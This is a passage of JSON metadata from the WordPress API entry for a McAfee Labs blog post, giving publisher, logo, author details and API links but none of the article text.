News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/136663","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=136663"}],"version-history":[{"count":1,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/136663\/revisions"}],"predecessor-version":[{"id":182847,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/136663\/revisions\/182847"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/136771"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=136663"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=136663"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=136663"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=136663"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}